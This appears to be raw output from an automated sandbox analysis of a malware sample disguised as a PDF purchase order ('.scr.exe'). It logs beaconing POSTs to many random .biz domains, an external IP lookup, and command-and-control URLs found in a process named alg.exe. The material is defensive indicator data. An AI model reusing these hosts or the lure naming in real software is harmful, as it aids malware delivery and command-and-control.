                            Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /jk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kjqwmlcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /uluonacniewnep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /vpbxgqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hqowbucy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /ohp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /wkqumdvynqwto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /npjswmwoxwkrbxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kfodjblu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hdqasqyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /qtuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vnjrxnyhwihcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /xwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /dokmgu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vqtoaeha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /lkirwmgfxelvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /hbnyekwgryhvrr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kxstjshewunex HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /yowtqsuuesmahbsb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /vipiwgiihx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /yclqyqmghucjea HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /wcffwbepjknhrkkd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /fsupyedkjsaginlp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /oknxycjjxcvmcyg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: global trafficHTTP traffic detected: POST /kquvnwuqqcd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /ggwhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: POST /qcnhkliwpylu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                            Source: unknown | TCP traffic detected without corresponding DNS query: 212.162.149.53
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                            Source: unknownHTTP traffic detected: POST /rurmblummdysikl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 828
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Oct 2024 08:08:15 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: 
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Thu, 10 Oct 2024 08:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: alg.exe, 00000009.00000003.3045551254.000000000059B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3060758556.000000000059C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
                            Source: alg.exe, 00000009.00000003.2576145561.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.0000000000562000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/fymjdtcv
                            Source: alg.exe, 00000009.00000003.3100543352.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3119389154.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3110909006.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3135716796.00000000005A9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3156257212.00000000005A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/mgsjgpoacwottwhx
                            Source: alg.exe, 00000009.00000003.3050069889.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3047643251.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3079434309.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3058249726.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3078569820.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.3061259113.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/oknxycjjxcvmcygp
                            Source: alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/sptkirsqxflbfd
                            Source: alg.exe, 00000009.00000003.2576145561.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2575063402.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2576692201.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/fymjdtcv
                            Source: alg.exe, 00000009.00000003.3120774885.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/mgsjgpoacwottwhxfP
                            Source: alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/mhacrmsw
                            Source: alg.exe, 00000009.00000003.3048558345.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/oknxycjjxcvmcygP.ca
                            Source: alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/rdoagulou
                            Source: alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/sptkirsqxflbf
                            Source: alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/uluonacniewnep
                            Source: alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756641044.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2682321054.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/vtkirsqxflbf
                            Source: alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2811149563.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2768613145.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756206332.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2745831053.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/dkwdmdeuhpgaj%
                            Source: alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2740295647.000000000057B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20/libobglfegsxaj%
                            Source: alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/dkwdmdeuhpg
                            Source: alg.exe, 00000009.00000003.2768613145.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756641044.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.15.20:80/libobglfegsxaj
                            Source: alg.exe, 00000009.00000003.2613582337.000000000055A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621081247.000000000055A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.0000000000562000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2614366913.0000000000562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/dvejgi
                            Source: alg.exe, 00000009.00000003.2725793461.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2641781426.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2634085222.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2690389382.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2937382799.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2718655052.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2744860394.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2811149563.000000000057A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2726765067.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2651055218.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2926946186.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2665977163.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2910224096.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2768613145.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2725466664.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2739777279.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2756206332.000000000057C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2709340960.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2946405217.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2745831053.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/kadnnjikurdd
                            Source: alg.exe, 00000009.00000003.2210828989.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/wP6
                            Source: alg.exe, 00000009.00000003.2504415483.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2211690726.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2444067771.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2228386739.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544401185.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2464247908.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2204873392.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2544895268.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2210828989.000000000055D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2229224734.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143/ysrvxblocwefk
                            Source: alg.exe, 00000009.00000003.2613582337.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/dvejgifP
                            Source: alg.exe, 00000009.00000003.2621710164.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/kadnnjikurdd
                            Source: alg.exe, 00000009.00000003.2464247908.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2229224734.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2211690726.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2465112671.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2228386739.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2444067771.000000000056E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000009.00000003.2210828989.000000000056E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.143:80/ww
